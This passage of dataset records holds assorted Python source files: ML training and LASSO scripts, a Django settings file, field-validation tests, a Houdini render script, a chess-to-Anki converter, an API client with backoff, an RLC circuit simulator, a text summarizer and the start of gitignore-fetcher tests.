history_val_acc[-1].append(float(val_corrects[-1]) / len(val_data))\n\n # Save best ensemble\n ensemble_acc = (float(val_corrects[-1]) / len(val_data))\n if ensemble_acc >= best_ensemble_acc:\n best_ensemble_acc = ensemble_acc\n best_ensemble = net.to_state_dict()\n\n # Save network\n Ensemble.save(best_ensemble,\n path.join(base_path_experiment, name_experiment, \"Saved Networks\"),\n current_branch_on_training)\n\n net.train()\n\n # Change branch on training\n if current_branch_on_training > 0:\n # Decrease max training epoch\n max_training_epoch = 2\n\n # Reload best configuration\n net.reload(best_ensemble)\n\n # Set optimizer\n optimizer = optim.SGD([{\"params\": net.base.parameters(), \"lr\": 0.02, \"momentum\": 0.9},\n {\"params\": net.branches[\n net.get_ensemble_size() - current_branch_on_training].parameters(),\n \"lr\": 0.1,\n \"momentum\": 0.9\n }])\n # Trained branches\n for b in range(net.get_ensemble_size()):\n if b != (net.get_ensemble_size() - current_branch_on_training):\n optimizer.add_param_group({\"params\": net.branches[b].parameters(), \"lr\": 0.02, \"momentum\": 0.9})\n\n # Change branch on training\n current_branch_on_training -= 1\n\n # Finish training after fine-tuning all branches\n else:\n break\n \n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"88544094","text":"# Django settings for poc project.\nimport os.path\nfrom os.path import abspath, dirname, join\nimport sys\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nROOT_DIR = abspath(join(dirname(__file__), os.path.pardir))\nPROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))\n\n##Add apps to sys.path\nsys.path.insert(1, os.path.join(ROOT_DIR, \"marketplaces\", \"apps\"))\nsys.path.insert(2, os.path.join(ROOT_DIR, \"stores\", \"apps\"))\nsys.path.insert(3, os.path.join(ROOT_DIR, \"libs\"))\nsys.path.insert(4, ROOT_DIR)\n\n\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = os.path.join(PROJECT_ROOT, 'dev_poc.db') # Or path to database file if using sqlite3.\nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\n\nTIME_ZONE = 'US/Eastern'\n#TIME_ZONE = 'America/Buenos_Aires'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media/admin/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = ''\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n# 'django.template.loaders.eggs.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'auth.middleware.AuthenticationMiddleware',\n 'djangoflash.middleware.FlashMiddleware',\n 'market.middleware.MarketPlaceMiddleware'\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.core.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media', \n 'django.core.context_processors.request', \n 'djangoflash.context_processors.flash',\n 'market.context_processors.marketplace',\n 'core.context_processors.google_key', \n 'core.context_processors.secure_media',\n)\n\n\nROOT_URLCONF = 'marketplaces.urls'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(PROJECT_ROOT, \"templates/\"),\n #os.path.join(ROOT_DIR, \"stores\", \"templates/\"),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin', \n\n #third\n 'south',\n 'uni_form',\n 'haystack',\n\n #POC\n 'auth',\n 'auctions',\n 'blog_pages',\n 'core',\n 'lots', \n 'for_sale',\n 'market',\n 'market_import',\n 'market_buy',\n 'market_community',\n 'market_sell',\n 'reports',\n 'inventory',\n 'payments',\n 'preferences',\n 'reversion',\n 'sell',\n 'search',\n 'subscriptions',\n 'shops',\n 'themes',\n 'users'\n)\n\nAUTHENTICATION_BACKENDS = (\n #'django.contrib.auth.backends.ModelBackend',\n 'core.emailBackend.ModelBackend',\n)\n\nAUTH_PROFILE_MODULE = 'users.Profile'\n\nLOGIN_URL = '/buy/login/'\nLOGIN_REDIRECT_URL= '/redirect' \n\nGOOGLE_KEY = ''\n\nDEFAULT_DNS = ''\n\n\nEMAIL_HOST = \"\"\nEMAIL_PORT = 587\nEMAIL_HOST_USER = \"\"\nEMAIL_HOST_PASSWORD = \"\"\nEMAIL_USE_TLS = True\nEMAIL_FROM = ''\n\n# django-haystack settings\nHAYSTACK_SITECONF = \"search.indexes\"\nHAYSTACK_SEARCH_ENGINE = \"solr\"\n# url for solr core that will serve and index our project data\nHAYSTACK_SOLR_URL = \"http://127.0.0.1:8983/solr/poc\"\nHAYSTACK_SEARCH_RESULTS_PER_PAGE = 16\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG, format='[=%(levelname)s : %(asctime)s] %(message)s',)\n\n#import sys\n#logging.basicConfig(stream=sys.stdout)\n\nTHEMES_ROOT = join(ROOT_DIR, \"stores\", 'media', 'themes') + '/'\nDEFAULT_THEME = 'default.zip'\nSITE_RUNNING_MODE='marketplaces'\n\n#Testing\nSOUTH_TESTS_MIGRATE = False\n\ntry:\n from local_settings import *\nexcept ImportError:\n pass\n","sub_path":"marketplaces/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"60449844","text":"######################################################################################################################################################################\n# This script is designed to take all of the output prediction files created from LASSO2 and knit them back together into an array with the same shape as y_val\n######################################################################################################################################################################\n\nfrom __future__ import division\nimport numpy as np\nimport time\nimport pandas as pd\nimport glob as glob\nimport os\nimport argparse\n\n######################################################################################################################################################################\n\n# Hard code some paths\nfp_data = '/mnt/research/compbio/krishnanlab/data/rnaseq/archs4/human_TPM/' # Private data, working to establish a iris dataset so others can work on it.\nfp = 'results/' # I recommend replacing this path with one in a scratch directory\n\n######################################################################################################################################################################\n\nval = np.arcsinh(np.load(fp_data + 'GPL570subset_ValExp.npy'))\ntest = np.arcsinh(np.load(fp_data + 'GPL570subset_TstExp.npy'))\ny_gene_idx = np.loadtxt(fp_data + 'GPL570subset_LINCS_ygenes_inds.txt',dtype=int)\ny_val = np.transpose(val[:,y_gene_idx])\ntrim = np.load(fp_data + 'trimmed_down_val_set_inds.npy')\ny_val = y_val[:,trim]\ny_test = np.transpose(test[:,y_gene_idx])\nevals = ['val','test']\nprint(np.shape(y_val))\nprint(np.shape(y_test))\nparser = argparse.ArgumentParser()\nparser.add_argument('-alpha', type = float,\n help = 'alpha used during LASSO regression')\nparser.add_argument('-date',type = str,\n help = 'Date of save path')\nparser.add_argument('-split',type = str,\n help = 'Date of save path')\nargs = parser.parse_args()\nalpha = args.alpha\ndate = args.date\nsplit = args.split\nif split == 'val':\n\tevals = ['val']\nelif split == 'test':\n\tevals = ['test']\nelif split == 'both':\n\tevals = ['val','test']\nfor eval in evals:\n if eval == 'val':\n missing = [] \n start_model = 0\n last_model = np.shape(y_val)[1]\n y_pred_val = [] \n print(last_model)\n for model in range(start_model,last_model,1): \n if os.path.isfile(fp + date + '/y_pred_trimmed_LINCS_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha)): \n file_ = np.load(fp + date + '/y_pred_trimmed_LINCS_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha))\n y_pred_val.append(file_) \n else: \n missing.append(model) \n continue \n print(np.shape(y_pred_val))\n np.save(fp + date + '/y_pred_trimmed_%s_alpha_%f_LINCS_sample_lasso.npy'%(eval,alpha),y_pred_val)\n np.save(fp + date + '/%f_trimmed_%s_LINCS_missing.npy'%(alpha,eval),missing)\n print(np.shape(missing))\n print('trimmed_missing', np.shape(missing))\n elif eval == 'test':\n missing = [] \n start_model = 0\n last_model = np.shape(y_test)[1]\n y_pred_test = [] \n for model in range(start_model,last_model,1): \n if os.path.isfile(fp + date + '/y_pred_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha)): \n file_ = np.load(fp + date + '/y_pred_%s_model_%i_alpha_%f_sample_Lasso.npy'%(eval,model,alpha)) \n y_pred_test.append(file_) \n else: \n missing.append(model) \n continue \n np.save(fp + date + '/y_pred_%s_alpha_%f_sample_lasso.npy'%(eval,alpha),y_pred_test)\n np.save(fp + date + 
'/%s_missing.npy'%eval,missing)\n else:\n print('Error occurred')\n\n","sub_path":"trimmed_LINCS_knitting_ypreds2.py","file_name":"trimmed_LINCS_knitting_ypreds2.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"296964528","text":"import os\nfrom fnmatch import fnmatch\n\nlist = []\nroot = '/media/sammer/Seagate Backup Plus Drive/activitNet/segments/frames-stable-many'\npattern = \"*.jpg\"\n\nfor path, subdirs, files in os.walk(root):\n for name in sorted(files):\n if fnmatch(name, pattern):\n list.append(os.path.join(path, name))\n\nthefile = open('../data/list.txt','w')\n\nfor item in list:\n thefile.write(\"%s\\n\" % item)\n\nthefile.close()","sub_path":"extra/get_all_filenames.py","file_name":"get_all_filenames.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"4542754","text":"\"\"\"Tests for the Amount field\"\"\"\n\nfrom decimal import Decimal\n\nimport pytest\n\nfrom swissdta.fields import Amount\nfrom swissdta.records.record import DTARecord\n\nFIELD_LENGTH = 8\n\n\nclass ARecord(DTARecord):\n \"\"\"Subclass of DTARecord for testing the Numeric field\"\"\"\n field = Amount(length=FIELD_LENGTH)\n\n\n@pytest.mark.parametrize(('value', 'expected_value'), (\n (Decimal('1_4_3'), '143, '),\n (Decimal('14_00_0'), '14000, '),\n (Decimal(0b11), '3, '),\n (Decimal(0B11), '3, '),\n (Decimal(0b11_11), '15, '),\n (Decimal(0B11_1), '7, '),\n (Decimal(0o17), '15, '),\n (Decimal(0O31), '25, '),\n (Decimal(0o10_42), '546, '),\n (Decimal(0O23_5), '157, '),\n (Decimal(0xAF), '175, '),\n (Decimal(0Xa3), '163, '),\n (Decimal(0xf4_4c), '62540, '),\n (Decimal(0Xfb_1), '4017, '),\n (Decimal('5.34'), '5,34 ')\n))\ndef test_format_values(value, expected_value):\n record = ARecord()\n record.field = value\n assert record.field == expected_value\n assert not record.validation_warnings\n assert not record.validation_errors\n\n\n@pytest.mark.parametrize(('value', 'expected_errors'), (\n (Decimal('5'), tuple()),\n (Decimal('5.'), tuple()),\n (Decimal('-5'), (\"[field] INVALID: May not be negative\",)),\n (Decimal('-5.'), (\"[field] INVALID: May not be negative\",)),\n (Decimal('0'), (\"[field] INVALID: May not be zero\",)),\n (Decimal('0.'), (\"[field] INVALID: May not be zero\",))\n))\ndef test_invalid_values(value, expected_errors):\n \"\"\"Verify that non positive values are detected\"\"\"\n record = ARecord()\n record.field = value\n assert not record.validation_warnings\n assert record.validation_errors == expected_errors\n","sub_path":"tests/test_field_amount.py","file_name":"test_field_amount.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"497301434","text":"#!/usr/bin/env hython\n\nimport os\nfrom optparse import OptionParser\nimport parsers.hbatch\n\nparser = OptionParser(usage=\"usage: %prog [options] hip_name rop_name\", version=\"%prog 1.0\")\nparser.add_option(\"-s\", \"--start\", dest=\"start\", type=\"int\", help=\"start frame number\")\nparser.add_option(\"-e\", \"--end\", dest=\"end\", type=\"int\", help=\"end frame number\")\nparser.add_option(\"-t\", \"--take\", dest=\"take\", type=\"string\", help=\"take name\")\nparser.add_option(\"-c\", \"--slice\", dest=\"slice\", type=\"int\", help=\"slice number\")\n\n(options, args) = parser.parse_args()\n\nif len(args) < 2:\n parser.error( \"At least one of mandatory rop_name or hip_name argument is missed.\")\nelif len(args) > 2:\n parser.error( \"Too many arguments provided.\")\nelse:\n hip = args[0]\n rop = args[1]\n\nstart = options.start\nend = options.end\ntake = options.take\nslice = options.slice\n\nhou.hipFile.load(hip,True)\n\n# Establish ROP to be used\nif rop[0] != \"/\":\n rop = \"/out/\" + rop\nropnode = hou.node( rop)\nif ropnode == None:\n raise hou.InvalidNodeName( rop + \" rop node wasn't found\")\n\n# Trying to set ROP to output progress\ndrivertypename = ropnode.type().name()\n\nif take != None and len(take) > 0:\n hou.hscript(\"takeset \" + take)\n\n# If end wasn't specified, render single frame\nif end == None:\n end = start\n\nos.putenv(\"AF_SLICE\", str(slice))\nos.putenv(\"AF_TRPORT\", str(18000))\nos.putenv(\"AF_TRADDRESS\", 'localhost')\n\nropnode.render((start,end))\n#while frame <= end:\n# print parsers.hbatch.keyframe + str(frame)\n# sys.stdout.flush()\n# frame += by\n\n","sub_path":"plugins/houdini/sim_slice.py","file_name":"sim_slice.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"50380329","text":"import sys\nimport json\n \ndef __make_notes_scv(item):\n q = item['question']['fen']\n qc = item['question']['comment']\n a = item['answer']['fen']\n ac = item['answer']['comment']\n return \"[fen]\" + q + \"[/fen]\" + '\\t' + qc + '\\t' + \"[fen]\" + a + \"[/fen]\" + '\\t' + ac\n\ndef query_csv(data): \n return list(map(__make_notes_scv, data['deck_items']))\n\nif len(sys.argv) != 2:\n print(\"Usage: lichess2anki.py lichess-card.json\")\nelse:\n with open(sys.argv[1]) as fobj:\n data = json.load(fobj) \n csv_items = query_csv(data)\n with open('somefile.txt', 'a') as the_file:\n for csv_item in csv_items:\n the_file.write(csv_item + '\\n')\n \n \n","sub_path":"lichess2anki.py","file_name":"lichess2anki.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"490907177","text":"# Copyright (C) Animal Logic Pty Ltd. All rights reserved.\nimport logging\nfrom PySide2 import QtWidgets, QtCore\nfrom functools import partial\n\nfrom validateRig import insideDCC as vr_insideDCC\nfrom validateRig.const import serialization as c_serialization\nfrom validateRig.core import validator as c_validator\nfrom validateRig.core import nodes as c_nodes\nfrom validateRig.core import parser as c_parser\nfrom validateRig.core import factory as c_factory\nfrom validateRig.core.nodes import SourceNode, DefaultValueNode, ConnectionValidityNode\nfrom validateRig.uiElements.dialogs import (\n validityNodeWidgets as uied_validityNodeWidgets,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef createValidator(name, data=None):\n # type: (str, dict) -> c_validator.Validator\n\n validator = c_factory.createValidator(name=name, data=data)\n return validator\n\n\ndef createSourceNode(name, longName, validityNodes=None):\n # type: (str, str, list[DefaultValueNode, ConnectionValidityNode]) -> None\n \"\"\"\n :param validityNodes: `list` of either DefaultValueNodes or ConnectionValidityNodes\n \"\"\"\n node = SourceNode(name=name, longName=longName, validityNodes=validityNodes)\n return node\n\n\ndef createDefaultValueNode(name, longName):\n # type: (str, str, any) -> None\n node = DefaultValueNode(name=name, longName=longName)\n return node\n\n\ndef createConnectionValidityNode(name, longName):\n # type: (str, str) -> ConnectionValidityNode\n\n node = ConnectionValidityNode(name=name, longName=longName)\n return node\n\n\ndef saveValidatorsToFile(validators, filepath):\n # type: (list, str) -> bool\n validatorDataList = list()\n for eachValidator in validators:\n validatorDataList.append(eachValidator.toData())\n\n c_parser.write(filepath=filepath, data=validatorDataList)\n\n return filepath\n\n\ndef updateNodeValuesFromDCC(node):\n # type: (c_nodes.Node) -> bool\n nodeType = node.nodeType\n if vr_insideDCC.insideMaya():\n from validateRig.core.maya import plugs as vrcm_plugs\n\n if nodeType == c_serialization.NT_DEFAULTVALUE:\n logger.debug(\"Updating defaultValueNode value from Maya\")\n data = node.defaultValueData\n attrName = data.keys()[0]\n mPlug = vrcm_plugs.getMPlugFromLongName(node.longName, attrName)\n value = vrcm_plugs.getMPlugValue(mPlug)\n logger.debug(\"MayaName: %s MayaValue: %s\" % (mPlug.name(), value))\n newData = {attrName: value}\n\n node.defaultValueData = newData\n\n elif nodeType == c_serialization.NT_CONNECTIONVALIDITY:\n logger.debug(\"Updating connectionNode value from Maya\")\n data = node.connectionData\n srcData = data.get(\"srcData\", list())\n srcPlugData = srcData.get(\"plugData\", list())\n srcNodeName = node.parent.longName\n srcMPlug = vrcm_plugs.fetchMPlugFromConnectionData(srcNodeName, srcPlugData)\n srcValue = vrcm_plugs.getMPlugValue(srcMPlug)\n logger.debug(\"MayaName: %s MayaValue: %s\" % (srcMPlug.name(), srcValue))\n srcData[\"attrValue\"] = srcValue\n\n destData = data.get(\"destData\", list())\n destPlugData = destData.get(\"plugData\", list())\n destNodeName = node.longName\n destMPlug = vrcm_plugs.fetchMPlugFromConnectionData(\n destNodeName, destPlugData\n )\n destValue = vrcm_plugs.getMPlugValue(destMPlug)\n logger.debug(\"MayaName: %s MayaValue: %s\" % (destMPlug.name(), destValue))\n destData[\"attrValue\"] = destValue\n\n node.connectionData = data\n\n return False\n\n\ndef getNSFromSelectedInDCC(nameSpaceInput):\n \"\"\" App sends signal to this to get the namespace from the DCC \"\"\"\n if 
vr_insideDCC.insideMaya():\n from maya import cmds\n\n # Smelly find of NS from : in name.\n firstSelected = cmds.ls(sl=True)[0]\n if \":\" in firstSelected:\n ns = cmds.ls(sl=True)[0].split(\":\")[0]\n logger.debug(\"NS in DCC: %s\" % ns)\n nameSpaceInput.setText(ns)\n\n\ndef selectNodesInDCC(nodeNames, event):\n # type: (list[str], QEvent) -> None\n\n for eachNode in nodeNames:\n if vr_insideDCC.insideMaya():\n from maya import cmds\n\n modifier = event.modifiers()\n if modifier == QtCore.Qt.ControlModifier:\n cmds.select(eachNode, add=True)\n else:\n cmds.select(eachNode, r=True)\n\n\ndef processValidationTreeWidgetDropEvent(nodeNames, validator, parent=None):\n # type: (list[str], c_validator.Validator, QtWidgets.QWidget) -> uid_attributeList.MultiSourceNodeListWidgets\n\n attrWidget = uied_validityNodeWidgets.MultiSourceNodeListWidgets(\"SourceNodes\", parent)\n\n # Check to see if this exists in the validator we dropped over.\n for longNodeName in nodeNames:\n srcNodesWidget = None\n if vr_insideDCC.insideMaya():\n from validateRig.core.maya import (validityNodeListWidget as vrcm_validityNodeListWidget,)\n import maya.cmds as cmds\n\n longLongNodeName = cmds.ls(longNodeName, l=True)\n if longLongNodeName:\n longLongNodeName = longLongNodeName[0]\n else:\n logger.error(\"Can't find node in scene: %s\" % longNodeName)\n continue\n logger.debug(\"longNodeName: %s\" % longNodeName)\n logger.debug(\"longLongNodeName: %s\" % longLongNodeName)\n\n existingSourceNode = None\n if validator().sourceNodeLongNameExists(longLongNodeName):\n existingSourceNode = validator().findSourceNodeByLongName(longLongNodeName)\n\n if existingSourceNode is None:\n srcNodesWidget = vrcm_validityNodeListWidget.MayaValidityNodesSelector(longNodeName=longLongNodeName,\n parent=None)\n else:\n srcNodesWidget = vrcm_validityNodeListWidget.MayaValidityNodesSelector.fromSourceNode(sourceNode=existingSourceNode,\n parent=None)\n\n if srcNodesWidget is None:\n continue\n\n attrWidget.addListWidget(srcNodesWidget)\n #attrWidget.sourceNodesAccepted.connect(partial(validator().addSourceNodes, force=True))\n\n return attrWidget\n","sub_path":"api/vrigCoreApi.py","file_name":"vrigCoreApi.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"172838858","text":"# encoding:utf-8\nimport requests\nfrom time import time, sleep\nimport luiza_challenge.settings as settings\n\nclass LuizaApi(object):\n \"\"\"\n Handles the requests to the LuizaLabs' Challenge API, using exponential\n backoff to retry failed requests and also handles the limit of requests\n per second\n \"\"\"\n BASE_URL = \"http://challenge-api.luizalabs.com/api\"\n\n def __init__(self):\n \"\"\"\n Constructor.\n \"\"\"\n\n # request_times is a queue that stores the times of the latest\n # requests made, in order to avoid blowing the req-per-sec limit\n self.request_times = [0] * settings.MAX_REQUESTS_PER_SECOND\n\n def send_request(self, path, parameters=None, attempts=0):\n \"\"\"\n Sends a request to the Challenge API. If the requests fail for a reason\n other than 'Not found' (404), this method is recursively invoked again\n using exponential backoff .\n\n path: the path of the endpoint, not including the API's base URL\n parameters: a dict with the GET parameters for the request (optional)\n attempts: how many times this request has been tried and failed so far\n\n Returns: the request's Response object\n Raises: Exception, if all attempts at the request fail\n \"\"\"\n\n # If too many requests have been made in a short time, wait a bit\n now = time()\n request_interval = now - self.request_times[0]\n if request_interval < 1.0:\n sleep(1.0 - request_interval + settings.REQUESTS_PER_SECOND_SAFE_MARGIN)\n self.request_times = self.request_times[1:] + [now]\n\n # Performs the request\n response = requests.get(self.BASE_URL + path, params=parameters)\n\n # If the request failed, waits and performs the request again until\n # the request succeeds or the maximum number of retries is exceeded\n if response.ok is False and response.status_code != 404:\n if attempts == settings.MAX_REQUEST_RETRIES:\n raise Exception('Could not perform request: {} ({})'.\\\n format(response.reason, response.status_code))\n\n sleep(settings.EXPONENTIAL_BACKOFF_BASE ** attempts)\n response = self.send_request(path, parameters, attempts + 1)\n\n return response\n","sub_path":"luiza_challenge/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"7139228","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 9 21:07:46 2014\n\n@author: alejandro\n\"\"\"\n\nimport numpy as np\n\nclass RLCcircuit:\n \n def __init__(self, R, L, C, i, q): # characteristics of the RLC circuit\n self.R = R\n self.L = L\n self.C = C\n self.i = i\n self.q = q\n \n def simulation_voscillating(self, Av, fv, tfin): # simulates an RLC \n # circuit given an oscillating voltage input\n deltat = 0.001\n n = int(tfin/deltat+1)\n iqvt = np.zeros(shape = (4, n), dtype = float)\n iqvt[0, 0] = self.i\n iqvt[1, 0] = self.q\n for i in range(1, n):\n iqvt[2, i] = Av*np.sin(2*np.pi*fv*i*deltat)\n iqvt[0, i] = (deltat/self.L)*(iqvt[2, i] - iqvt[1, i-1]/self.C - self.R*iqvt[0, i-1]) + iqvt[0, i-1]\n iqvt[1, i] = iqvt[0, i-1]*deltat + iqvt[1, i-1]\n iqvt[3, i] = iqvt[3, i-1] + deltat\n return iqvt\n self.i = iqvt[0, n-1]\n self.q = iqvt[1, n-1]\n \n def simulation_vsteady(self, V, tfin): # simulates an RLC circuit given a\n # steady voltage input\n deltat = 0.001\n n = int(tfin/deltat+1)\n iqvt = np.zeros(shape = (4, n), dtype = float)\n iqvt[0, 0] = self.i\n iqvt[1, 0] = self.q\n iqvt[2, :] = V\n for i in range(1, n):\n iqvt[0, i] = (deltat/self.L)*(V - iqvt[1, i-1]/self.C - self.R*iqvt[0, i-1]) + iqvt[0, i-1]\n iqvt[1, i] = iqvt[0, i-1]*deltat + iqvt[1, i-1]\n iqvt[3, i] = iqvt[3, i-1] + deltat\n return iqvt\n self.i = iqvt[0, n-1]\n self.q = iqvt[1, n-1]\n \n # Both methods have as an output a matrix with the current intensity,\n # capacitor charge and input voltage with respect to the instant of time","sub_path":"RLC.py","file_name":"RLC.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"100317776","text":"# textsumExample to get a feel for text summerization\n# importing libraries for text summerization\nimport io\nimport json\nfrom pandas.io.json import json_normalize\nimport numpy as np\nimport pandas as pd\nimport nltk\nimport re\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import sent_tokenize\nimport networkx as nx\nimport math\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom gensim.summarization.summarizer import summarize\n# function to remove these stopwords from our dataset\ndef remove_stopwords(sen):\n sen_new = \" \".join([i for i in sen if i not in stop_words])\n return sen_new\n\n# Extract word vectors\n# using pre-trained Wikipedia 2014 + Gigaword 5 GloVe vectors\n# you can download it @ https://nlp.stanford.edu/data/glove.6B.zip\n\ndef get_rank(myList = [],*args):\n textrank = ''\n for i in range(math.ceil(len(ranked_sentences)/3)):\n textrank += (ranked_sentences[i][1])\n return textrank\n\nword_embeddings = {}\nf = open('glove.6B.100d.txt', encoding='utf-8')\nfor line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n word_embeddings[word] = coefs\nf.close()\n\n# create dataframe for article to munipulate\ndf = pd.read_json(\"update.json\")\nwith open('update.json',encoding=\"utf8\") as data_file:\n data = json.load(data_file)\n\n#normalize df\ndf_fields = pd.json_normalize(data,max_level=1)\n\nfor z in range(len(df)):\n sumtext = df_fields['fields.description'][z]\n\n sentences = []\n #for s in df_fields['fields.description']:\n sentences.append(sent_tokenize(df_fields['fields.description'][z]))\n\n sentences = [y for x in sentences for y in x] # flatten list\n\n # remove punctuations, numbers and special characters\n clean_sentences = pd.Series(sentences).str.replace(\"[^a-zA-Z]\", \" \")\n\n # make alphabets lowercase\n clean_sentences = [s.lower() for s in clean_sentences]\n\n stop_words = stopwords.words('english')\n\n # create vectors for our sentences\n sentence_vectors = []\n for i in clean_sentences:\n if len(i) != 0:\n v = sum([word_embeddings.get(w, np.zeros((100,))) for w in i.split()])/(len(i.split())+0.001)\n else:\n v = np.zeros((100,))\n sentence_vectors.append(v)\n\n # similarity matrix\n sim_mat = np.zeros([len(sentences), len(sentences)])\n\n # initialize the matrix with cosine similarity scores.\n for i in range(len(sentences)):\n for j in range(len(sentences)):\n if i != j:\n sim_mat[i][j] = cosine_similarity(sentence_vectors[i].reshape(1,100), sentence_vectors[j].reshape(1,100))[0,0]\n\n nx_graph = nx.from_numpy_array(sim_mat)\n scores = nx.pagerank(nx_graph)\n\n #Summary Extraction\n ranked_sentences = ''\n ranked_sentences = sorted(((scores[i],s) for i,s in enumerate(sentences)), reverse=True)\n text = get_rank(ranked_sentences)\n t = summarize(text,ratio=0.15)\n if (t == ''):\n df.fields[z]['description'] = text\n else:\n df.fields[z]['description'] = t\n \n\nx={}\nfor i in range(len(df)):\n temp={}\n temp[\"model\"] = \"jobs.jobsinfo\"\n temp[\"pk\"]= i\n x[i]=temp\n x[i][\"fields\"]={\n \"JobTitle\":(df.fields[i]['JobTitle']),\n \"organization\":(df.fields[i]['organization']),\n \"description\": df.fields[i]['description'],\n \"salary\":(df.fields[i]['salary']),\n \"place\":df.fields[i]['place'],\n \"link\":df.fields[i]['link'],\n \"site\":df.fields[i]['site']}\nx=list(x.values())\n\nwith io.open('update_summary.json', 'w',encoding='windows-1252') as fp:\n json.dump(x,fp)\n#Note: My django did not like indents so I got rid of 
them\n","sub_path":"web_django/src/textsum.py","file_name":"textsum.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"463743118","text":"import pytest\n\nimport fetch_gitignore\n\nclass TestDirsExist:\n\n def test_dir_exists(self):\n fetch_gitignore.dirs_exist(['logs/'])\n\n def test_multiple_dirs_exist(self):\n fetch_gitignore.dirs_exist(['logs/', 'venv/'])\n\n def test_dir_doesnt_exist(self):\n with pytest.raises(fetch_gitignore.GitIgnoreDirectoryDoesntExistError) as e:\n fetch_gitignore.dirs_exist(['logs/', 'venv/', 'thisdirwillcausefailure/'])\n\n assert 'thisdirwillcausefailure' in str(e.value)\n assert 'logs' not in str(e.value)\n assert 'venv' not in str(e.value)\n\n\nclass TestGetGitIgnore:\n class MockResponse:\n def __init__(self):\n self.status_code = 200\n self.url = 'http://httpbin.org/get'\n self.headers = {'foo': 'bar'}\n\n @property\n def text(self):\n return \"test data\"\n\n def mock_get(self, url):\n return self.MockResponse()\n\n def test_get_gitignore_success_single(self, monkeypatch, tmp_path):\n d = tmp_path / \"sub\"\n d.mkdir()\n p = d / \".gitignore\"\n monkeypatch.setattr(fetch_gitignore.requests, 'get', self.mock_get)\n fetch_gitignore.get_gitingnore('http://thisisatest.com', [d])\n assert p.read_text() == \"test data\\n# VS Code\\n.vscode/\"\n assert len(list(tmp_path.iterdir())) == 1\n\n def test_get_gitignore_success_multi(self, monkeypatch, tmp_path):\n dirs = []\n files = []\n for index in range(3):\n d = tmp_path / 